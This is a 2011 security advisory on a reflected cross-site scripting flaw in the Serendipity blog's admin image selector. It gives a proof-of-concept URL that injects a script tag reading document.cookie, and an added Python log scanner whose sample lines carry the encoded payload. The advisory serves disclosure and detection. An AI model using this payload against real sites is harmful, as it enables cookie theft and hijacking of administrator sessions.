SSCHADV2011-015 - Serendipity 'serendipity[filter][bp.ALT]' Cross-Site Scripting vulnerability
Advisory: Serendipity 'serendipity[filter][bp.ALT]' Cross-Site Scripting vulnerability
Advisory ID: SSCHADV2011-015
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.5.5
Vendor URL:
Vendor Status: fixed
CVE-ID: -
======================
Vulnerability Description:
======================
The parameter "serendipity[filter][bp.ALT]" in the Serendipity backend is prone to a Cross-Site Scripting vulnerability.
==============
Technical Details:
==============
http://<target>/serendipity/serendipity_admin_image_selector.php?serendipity[filter][bp.ALT]=</script><script>alert(document.cookie)</script>&go=+-+Go!–
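A log check for the request pattern above, added here as an example (it is not part of the original advisory or of Serendipity). It assumes combined-format access logs; the function names, the sample lines and the rule that angle brackets in any serendipity[filter][...] value are suspicious are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

ENDPOINT = "serendipity_admin_image_selector.php"  # script named in the advisory
FILTER_KEY = re.compile(r"^serendipity\[filter\]\[[^\]]*\]$")  # any filter field
MARKUP = re.compile(r"[<>]")  # assumption: angle brackets in a filter are suspect
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # combined log format

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Nov/2011:10:00:00 +0000] "GET /serendipity/'
    'serendipity_admin_image_selector.php?serendipity[filter][bp.ALT]=sunset'
    '&go=+-+Go! HTTP/1.1" 200 5120',
    '192.0.2.77 - - [02/Nov/2011:10:01:12 +0000] "GET /serendipity/'
    'serendipity_admin_image_selector.php?serendipity%5Bfilter%5D%5Bbp.ALT%5D='
    '%3C%2Fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E'
    '&go=+-+Go! HTTP/1.1" 200 5342',
    '192.0.2.77 - - [02/Nov/2011:10:01:40 +0000] "GET /serendipity/'
    'serendipity_admin_image_selector.php?serendipity[filter][bp.ALT]='
    '%253Cb%253E HTTP/1.1" 200 5130',
    '192.0.2.10 - - [02/Nov/2011:10:02:00 +0000] "GET /index.php?q=%3Cb%3E '
    'HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_filter_params(target):
    """Return (key, value) pairs of filter fields that carry markup."""
    path, _, query = target.partition("?")
    if not path.endswith("/" + ENDPOINT):
        return []
    hits = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        key, value = fully_decode(key), fully_decode(value)
        if FILTER_KEY.match(key) and MARKUP.search(value):
            hits.append((key, value))
    return hits

def scan(lines):
    """Return (line_number, key, decoded_value) for every suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        for key, value in suspicious_filter_params(match.group(1)) if match else []:
            findings.append((number, key, value))
    return findings
```

A hit shows that such a request was sent, not that script ran in an administrator's browser; the fix remains the upgrade to Serendipity 1.6.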
=====
Solution:
=====
Upgrade to Serendipity 1.6
================
Disclosure Timeline:
================
22-Sep-2011 – informed developers
27-Oct-2011 – fixed by vendor
02-Nov-2011 – release date of this security advisory
02-Nov-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.